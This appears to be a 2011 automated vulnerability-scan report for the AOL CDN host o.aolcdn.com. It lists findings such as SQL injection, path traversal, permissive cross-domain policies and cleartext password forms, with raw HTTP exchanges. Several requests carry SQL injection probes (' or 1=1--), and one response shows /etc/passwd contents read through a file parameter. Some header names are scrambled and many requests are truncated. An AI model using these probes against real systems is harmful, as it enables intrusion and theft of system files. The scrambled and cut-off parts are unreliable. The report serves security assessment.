1.1. http://o.aolcdn.com/os/fanhouse/design/v2/css/fanhouse.css [REST URL parameter 2]
1.2. http://o.aolcdn.com/os/fonts/helvetica_lt_77_bold_condensed-webfont.woff [REST URL parameter 3]
1.3. http://o.aolcdn.com/os/realestate/favicon.ico [REST URL parameter 2]
1.4. http://o.aolcdn.com/os_merge/ [file parameter]
3. Silverlight cross-domain policy
4. Cleartext submission of password
6. Password field submitted using GET method
7. Password field with autocomplete enabled
8. Cross-domain Referer leakage
8.1. http://o.aolcdn.com/art/merge/
8.2. http://o.aolcdn.com/os/mobile-desktop/js/mobileblog.js
8.3. http://o.aolcdn.com/os_merge/
8.4. http://o.aolcdn.com/os_merge/
9. Cross-domain script include
10.1. http://o.aolcdn.com/art/webwidgets/sfsw_v1_3/feeds_subscribe_en_us.js
10.2. http://o.aolcdn.com/os/df/js/feeds_subscribe_en_us.js
10.3. http://o.aolcdn.com/os_merge/
11. HTML does not specify charset
12. Content type incorrectly stated
12.1. http://o.aolcdn.com/favicon.ico
12.2. http://o.aolcdn.com/lifestream/cdn/27.0.10/img/favicons/lifestream.ico
12.3. http://o.aolcdn.com/os_merge/
Severity: | High |
Confidence: | Tentative |
Host: | http://o.aolcdn.com |
Path: | /os/fanhouse/design/v2 |
GET /os/fanhouse17216175'%20or%201%3d1-- Host: o.aolcdn.com Proxy-Connection: keep-alive Referer: http://www.mmafighting User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Wed, 14 Apr 2010 18:22:52 GMT Content-Type: image/gif Content-Length: 3488 Cache-Control: public, max-age=94670778 Expires: Sun, 04 May 2014 18:36:02 GMT Date: Thu, 05 May 2011 01:09:44 GMT Connection: close GIF89ax.Z.....3f3.3f3f.f. ...V,..M....J}E.Aqs|h.B( ....RR?......-..(Ax%A.... ..TP...?.?..d6...*O%?Eq.. .... ...J[K........gc...d..b. ....B...B.......-Y..k,,. .#. .$w.\..$.R. V% >j). .<e._*d.A....! x...pQ..T1.^.Iw.u`..Bh..d ..N.I ..$....bwG..+...+.X+.... .^7Y..e...~..k.....4!.h.. ..U..h.'....@#..Le....... L.S.@..t .!sF0.,..\.@.....i.#nz... ...[SNIP]... |
GET /os/fanhouse17216175'%20or%201%3d2-- Host: o.aolcdn.com Proxy-Connection: keep-alive Referer: http://www.mmafighting User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=utf-8 ntCoent-Length: 1159 Cache-Control: public, max-age=30 Expires: Thu, 05 May 2011 01:10:14 GMT Date: Thu, 05 May 2011 01:09:44 GMT Connection: close Vary: Accept-Encoding Content-Length: 1159 <html><head><title>Apache Tomcat/5.5.25 - Error report</title><style><!- |
Severity: | High |
Confidence: | Tentative |
Host: | http://o.aolcdn.com |
Path: | /os/fonts/helvetica_lt_77 |
GET /os/fonts/helvetica_lt_77 Host: o.aolcdn.com Proxy-Connection: keep-alive Referer: http://www.huffingtonpost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Wed, 14 Apr 2010 18:22:52 GMT Content-Type: image/gif Content-Length: 3488 Cache-Control: public, max-age=94670778 Expires: Sun, 04 May 2014 18:47:14 GMT Date: Thu, 05 May 2011 01:20:56 GMT Connection: close GIF89ax.Z.....3f3.3f3f.f. ...V,..M....J}E.Aqs|h.B( ....RR?......-..(Ax%A.... ..TP...?.?..d6...*O%?Eq.. .... ...J[K........gc...d..b. ....B...B.......-Y..k,,. .#. .$w.\..$.R. V% >j). .<e._*d.A....! x...pQ..T1.^.Iw.u`..Bh..d ..N.I ..$....bwG..+...+.X+.... .^7Y..e...~..k.....4!.h.. ..U..h.'....@#..Le....... L.S.@..t .!sF0.,..\.@.....i.#nz... ...[SNIP]... |
GET /os/fonts/helvetica_lt_77 Host: o.aolcdn.com Proxy-Connection: keep-alive Referer: http://www.huffingtonpost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=utf-8 ntCoent-Length: 1201 Cache-Control: public, max-age=30 Expires: Thu, 05 May 2011 01:21:26 GMT Date: Thu, 05 May 2011 01:20:56 GMT Connection: close Vary: Accept-Encoding Content-Length: 1201 <html><head><title>Apache Tomcat/5.5.25 - Error report</title><style><!- |
Severity: | High |
Confidence: | Tentative |
Host: | http://o.aolcdn.com |
Path: | /os/realestate/favicon |
GET /os/realestate51809587'%20or%201%3d1-- Host: o.aolcdn.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Wed, 14 Apr 2010 18:22:52 GMT Content-Type: image/gif Content-Length: 3488 Cache-Control: public, max-age=94670778 Expires: Sun, 04 May 2014 18:53:58 GMT Date: Thu, 05 May 2011 01:27:40 GMT Connection: close GIF89ax.Z.....3f3.3f3f.f. ...V,..M....J}E.Aqs|h.B( ....RR?......-..(Ax%A.... ..TP...?.?..d6...*O%?Eq.. .... ...J[K........gc...d..b. ....B...B.......-Y..k,,. .#. .$w.\..$.R. V% >j). .<e._*d.A....! x...pQ..T1.^.Iw.u`..Bh..d ..N.I ..$....bwG..+...+.X+.... .^7Y..e...~..k.....4!.h.. ..U..h.'....@#..Le....... L.S.@..t .!sF0.,..\.@.....i.#nz... ...[SNIP]... |
GET /os/realestate51809587'%20or%201%3d2-- Host: o.aolcdn.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=utf-8 Cteonnt-Length: 1120 Cache-Control: public, max-age=30 Expires: Thu, 05 May 2011 01:28:10 GMT Date: Thu, 05 May 2011 01:27:40 GMT Connection: close Vary: Accept-Encoding Content-Length: 1120 <html><head><title>Apache Tomcat/5.5.25 - Error report</title><style><!- |
Severity: | High |
Confidence: | Tentative |
Host: | http://o.aolcdn.com |
Path: | /os_merge/ |
GET /os_merge/?file=/aol Host: o.aolcdn.com Proxy-Connection: keep-alive Referer: http://music.aol.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Mon, 18 Apr 2011 14:47:44 GMT Content-Type: application/javascript Cache-Control: public, max-age=3600 Expires: Thu, 05 May 2011 02:18:22 GMT Date: Thu, 05 May 2011 01:18:22 GMT Connection: close Vary: Accept-Encoding Connection: Transfer-Encoding Content-Length: 122281 /*! * jQuery JavaScript Library v1.4.3 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Siz ...[SNIP]... ;U.devId=(f.aolGetAu ...[SNIP]... |
GET /os_merge/?file=/aol Host: o.aolcdn.com Proxy-Connection: keep-alive Referer: http://music.aol.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Mon, 18 Apr 2011 14:47:44 GMT Content-Type: application/javascript Cache-Control: public, max-age=3600 Expires: Thu, 05 May 2011 02:18:23 GMT Date: Thu, 05 May 2011 01:18:23 GMT Connection: close Vary: Accept-Encoding Connection: Transfer-Encoding Content-Length: 118535 /*! * jQuery JavaScript Library v1.4.3 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Siz ...[SNIP]... ;U.devId=(f.aolGetAu ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://o.aolcdn.com |
Path: | /art/merge/ |
GET /art/merge/?f=/mobileportal/s2c_modal Host: o.aolcdn.com Proxy-Connection: keep-alive Referer: http://mobile.aol.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Mime-Version: 1.0 Server: AOLserver/4.0.10 Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: max-age=86400 Expires: Fri, 06 May 2011 01:12:53 GMT Date: Thu, 05 May 2011 01:12:53 GMT Connection: close Content-Length: 20992 root:x:0:0:root:/root:/bin bin:x:1:1:bin:/bin:/bin/false daemon:x:2:2:daemon:/sbin adm:x:3:4:adm:/var/adm: sync:x:5:0:sync:/sbin: shutdown:x:6:0:shutdown: halt:x:7:0:halt:/sbin: mail:x:8:12:mail:/var operator:x:11:0:operator: ftp:x:14:50:FTP User:/var/ftp:/sbin nobody:x:99:99:Nobody:/:/bin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm haldaemon:x:68:68:HAL da ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://o.aolcdn.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: o.aolcdn.com |
HTTP/1.0 200 OK Server: Apache ETag: "d8baf0f1b81f70a7f23 Last-Modified: Wed, 27 Aug 2008 17:00:43 GMT Content-Type: application/xml Cache-Control: max-age=1209600 Expires: Thu, 19 May 2011 00:56:50 GMT Date: Thu, 05 May 2011 00:56:50 GMT Content-Length: 338 Connection: close <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*"/> </allow-from> <grant-to> <resource ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://o.aolcdn.com |
Path: | /art/merge/ |
GET /art/merge/?f=/mobil Host: o.aolcdn.com Proxy-Connection: keep-alive Referer: http://mobile.aol.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Mime-Version: 1.0 Server: AOLserver/4.0.10 Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: max-age=86400 Expires: Fri, 06 May 2011 00:58:27 GMT Date: Thu, 05 May 2011 00:58:27 GMT Connection: close Content-Length: 27714 eval(function ($) { $.modal = function (data, options) { return $.modal.impl.init(data, options); }; $.modal.close = function () { $.modal.impl.close(true); }; $.fn ...[SNIP]... </span><form name="login" onsubmit="profileLogin(); return false;"><label for="confirmpassword"> ...[SNIP]... </label><input type="password" name="confirmpassword" id="pwLogin" /><input id="loginButton" type="submit" onClick="profileLogin();" value="Login"> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://o.aolcdn.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: o.aolcdn.com |
HTTP/1.0 200 OK Server: Apache ETag: "86252e13a238a19354a Last-Modified: Tue, 04 Jan 2011 16:25:41 GMT Content-Type: application/xml Cache-Control: max-age=1017380 Expires: Mon, 16 May 2011 19:33:10 GMT Date: Thu, 05 May 2011 00:56:50 GMT Content-Length: 3059 Connection: close <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy xmlns:xsi="http://www.w3 ...[SNIP]... <allow-access-from domain="*.aol.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.*.aol.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.channels.aol.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.web.aol.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.my.aol.com" secure="false"/> ...[SNIP]... <allow-access-from domain="channelevents.estage.aol ...[SNIP]... <allow-access-from domain="channelevents.aol.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.office.aol.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.channel.aol.com" secure="false"/> ...[SNIP]... <allow-access-from domain="cdn-startpage.aol.com" secure="false"/> ...[SNIP]... <allow-access-from domain="startpage.aol.com" secure="false"/> ...[SNIP]... <allow-access-from domain="cdn.digitalcity.com" secure="false"/> ...[SNIP]... <allow-access-from domain="progressive.stream.aol ...[SNIP]... <allow-access-from domain="*.video.aol.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.video.office.aol.com" secure="false"/> ...[SNIP]... <allow-access-from domain="publishing.aol.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.publishing.aol.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.aolcdn.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.tmz.com" secure="false"/> ...[SNIP]... <allow-access-from domain="tmz.warnerbros.com" secure="false"/> ...[SNIP]... <allow-access-from domain="goldrush.aol.com" to-ports="80"/> ...[SNIP]... <allow-access-from domain="stage.goldrush.aol.com" to-ports="80"/> ...[SNIP]... <allow-access-from domain="*.facebook.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.pointroll.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.pointroll.net" secure="false"/> ...[SNIP]... <allow-access-from domain="*.platformaprojects.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.digitas.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.yourminis.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.brightcove.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.lightningcast.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.lightningcast.net" secure="false"/> ...[SNIP]... <allow-access-from domain="*.adtechus.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.atwola.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.rtm.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.advertising.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.ad-preview.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.domanistudios.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.*.domanistudios.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.icq.com" secure="false"/> ...[SNIP]... <allow-access-from domain="studionow.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.studionow.com" secure="false"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://o.aolcdn.com |
Path: | /art/merge/ |
GET /art/merge/?f=/mobil Host: o.aolcdn.com Proxy-Connection: keep-alive Referer: http://mobile.aol.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Mime-Version: 1.0 Server: AOLserver/4.0.10 Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: max-age=86400 Expires: Fri, 06 May 2011 00:58:27 GMT Date: Thu, 05 May 2011 00:58:27 GMT Connection: close Content-Length: 27714 eval(function ($) { $.modal = function (data, options) { return $.modal.impl.init(data, options); }; $.modal.close = function () { $.modal.impl.close(true); }; $.fn ...[SNIP]... </span><form name="login" onsubmit="profileLogin(); return false;"><label for="confirmpassword"> ...[SNIP]... </label><input type="password" name="confirmpassword" id="pwLogin" /><input id="loginButton" type="submit" onClick="profileLogin();" value="Login"> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://o.aolcdn.com |
Path: | /art/merge/ |
GET /art/merge/?f=/mobil Host: o.aolcdn.com Proxy-Connection: keep-alive Referer: http://mobile.aol.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Mime-Version: 1.0 Server: AOLserver/4.0.10 Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: max-age=86400 Expires: Fri, 06 May 2011 00:58:27 GMT Date: Thu, 05 May 2011 00:58:27 GMT Connection: close Content-Length: 27714 eval(function ($) { $.modal = function (data, options) { return $.modal.impl.init(data, options); }; $.modal.close = function () { $.modal.impl.close(true); }; $.fn ...[SNIP]... </span><form name="login" onsubmit="profileLogin(); return false;"><label for="confirmpassword"> ...[SNIP]... </label><input type="password" name="confirmpassword" id="pwLogin" /><input id="loginButton" type="submit" onClick="profileLogin();" value="Login"> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://o.aolcdn.com |
Path: | /art/merge/ |
GET /art/merge/?f=/fanhouse Host: o.aolcdn.com Proxy-Connection: keep-alive Referer: http://www.mmafighting User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Mime-Version: 1.0 Server: AOLserver/4.0.10 Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: max-age=86400 Expires: Fri, 06 May 2011 00:57:19 GMT Date: Thu, 05 May 2011 00:57:19 GMT Connection: close Content-Length: 68145 jQuery.cookie=function ...[SNIP]... tion intializeSeq(){initV function handleUpdate(){theHTML='' ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://o.aolcdn.com |
Path: | /os/mobile-desktop/js |
GET /os/mobile-desktop/js Host: o.aolcdn.com Proxy-Connection: keep-alive Referer: http://mobile.aol.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Tue, 19 Apr 2011 04:17:01 GMT Content-Type: application/javascript Cteonnt-Length: 13447 Cache-Control: public, max-age=3600 Expires: Thu, 05 May 2011 01:58:28 GMT Date: Thu, 05 May 2011 00:58:28 GMT Connection: close Vary: Accept-Encoding Content-Length: 13447 //DL Rotator var SLIDE_pic = new Array(); var SLIDE_load = new Array(); var SLIDE_link = new Array(); var SLIDE_status, SLIDE_timeout; var SLIDE_actual = 0; var SLIDE_speed = 5000; var SLIDE_fa ...[SNIP]... <li class="GH_hat_LI"><a href="http://my ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://o.aolcdn.com |
Path: | /os_merge/ |
GET /os_merge/?file=/aol Host: o.aolcdn.com Proxy-Connection: keep-alive Referer: http://www.mmafighting User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Fri, 08 Apr 2011 03:07:54 GMT Content-Type: application/javascript Cache-Control: public, max-age=2592000 Expires: Sat, 04 Jun 2011 00:57:19 GMT Date: Thu, 05 May 2011 00:57:19 GMT Connection: close Vary: Accept-Encoding Content-Length: 108673 /*! * jQuery JavaScript Library v1.4.4 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Siz ...[SNIP]... </a>',facebook:'<a class="aol-share-facebook ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://o.aolcdn.com |
Path: | /os_merge/ |
GET /os_merge/?file=/df/js Host: o.aolcdn.com Proxy-Connection: keep-alive Referer: http://www.dailyfinance User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Wed, 27 Apr 2011 15:07:57 GMT Content-Type: application/javascript Cache-Control: public, max-age=3600 Expires: Thu, 05 May 2011 01:58:35 GMT Date: Thu, 05 May 2011 00:58:35 GMT Connection: close Vary: Accept-Encoding Content-Length: 59226 /* name : globalHeader file : jquery.globalheader.js author : Ali Hasan (c) Copyright 2009 AOL LLC $LastChangedDate: 2009-11-24 08:30:32 -0500 (Tue, 24 Nov 2009) $ $Rev: 134091 $ */ (function(a) ...[SNIP]... in","toolbar=no, menubar=no, resizable=no, location=no, directories=no, scrollbars=yes, width=802, height=604")};qp.common ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://o.aolcdn.com |
Path: | /os/df/js/copyRight.js |
GET /os/df/js/copyRight.js HTTP/1.1 Host: o.aolcdn.com Proxy-Connection: keep-alive Referer: http://www.dailyfinance User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Wed, 27 Apr 2011 15:23:30 GMT Content-Type: application/javascript Cteonnt-Length: 4448 Cache-Control: public, max-age=3600 Expires: Thu, 05 May 2011 01:58:16 GMT Date: Thu, 05 May 2011 00:58:16 GMT Connection: close Vary: Accept-Encoding Content-Length: 4448 if(!Surphace){var Surphace={}}Surphace ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://o.aolcdn.com |
Path: | /art/webwidgets/sfsw_v1_3 |
GET /art/webwidgets/sfsw_v1_3 Host: o.aolcdn.com Proxy-Connection: keep-alive Referer: http://music.aol.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Last-Modified: Sat, 13 Oct 2007 03:39:09 GMT Mime-Version: 1.0 Server: AOLserver/4.0.10 Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: max-age=2592000 Expires: Sat, 04 Jun 2011 00:56:51 GMT Date: Thu, 05 May 2011 00:56:51 GMT Connection: close Content-Length: 29727 /* -- AOL Standard Feed Subscribe Widget -- Author: Miodrag Kekic (miodrag.kekic@corp.aol Credits: Dom object is based on Yahoo UILib YAHOO.util.Dom version 0.11.1 Copyright (c) 2006, Yahoo! Inc. All rights reserved. License: http://developer.yahoo */ n ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://o.aolcdn.com |
Path: | /os/df/js/feeds_subscribe |
GET /os/df/js/feeds_subscribe Host: o.aolcdn.com Proxy-Connection: keep-alive Referer: http://www.dailyfinance User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Wed, 27 Apr 2011 15:54:12 GMT Content-Type: application/javascript Cteonnt-Length: 29727 Cache-Control: public, max-age=3600 Expires: Thu, 05 May 2011 01:58:16 GMT Date: Thu, 05 May 2011 00:58:16 GMT Connection: close Vary: Accept-Encoding Content-Length: 29727 /* -- AOL Standard Feed Subscribe Widget -- Author: Miodrag Kekic (miodrag.kekic@corp.aol Credits: Dom object is based on Yahoo UILib YAHOO.util.Dom version 0.11.1 Copyright (c) 2006, Yahoo! Inc. All rights reserved. License: http://developer.yahoo */ n ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://o.aolcdn.com |
Path: | /os_merge/ |
GET /os_merge/?file=/aol Host: o.aolcdn.com Proxy-Connection: keep-alive Referer: http://mobile.aol.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Wed, 16 Mar 2011 00:09:42 GMT Content-Type: text/plain Cache-Control: public, max-age=2592000 Expires: Sat, 04 Jun 2011 00:58:27 GMT Date: Thu, 05 May 2011 00:58:27 GMT Connection: close Vary: Accept-Encoding Content-Length: 108120 /*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Siz ...[SNIP]... rue}/false, if window can be scrolled. gui: Additional pixels to add to the screen height (helps centering vertically) nu: if the name should be unique. Code History: 2/9/2010 - David Artz (david.artz@corp.aol.com) Started development of library. Horay. */ (function($, window){ var index = 0; $.openWindow = function( url, customOptions ) { // Set up default window features. var defaultOptions ...[SNIP]... rue}/false, if window can be scrolled. gui: Additional pixels to add to the screen height (helps centering vertically) nu: if the name should be unique. Code History: 2/9/2010 - David Artz (david.artz@corp.aol.com) Started development of library. Horay. */ (function($, window){ var index = 0; $.openWindow = function( url, customOptions ) { // Set up default window features. var defaultOptions ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://o.aolcdn.com |
Path: | /lifestream/cdn/27.0.10 |
GET /lifestream/cdn/27.0.10 Host: o.aolcdn.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html Cteonnt-Length: 2862 Cache-Control: max-age=2407192 Expires: Wed, 01 Jun 2011 21:39:06 GMT Date: Thu, 05 May 2011 00:59:14 GMT Connection: close Vary: Accept-Encoding Content-Length: 2862 ..............(...6...... ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://o.aolcdn.com |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 Host: o.aolcdn.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html; charset=iso-8859-1 Cache-Control: max-age=1209595 Expires: Thu, 19 May 2011 01:17:47 GMT Date: Thu, 05 May 2011 01:17:52 GMT Content-Length: 15 Connection: close Vary: Accept-Encoding X-N: S File not found. |
Severity: | Information |
Confidence: | Firm |
Host: | http://o.aolcdn.com |
Path: | /lifestream/cdn/27.0.10 |
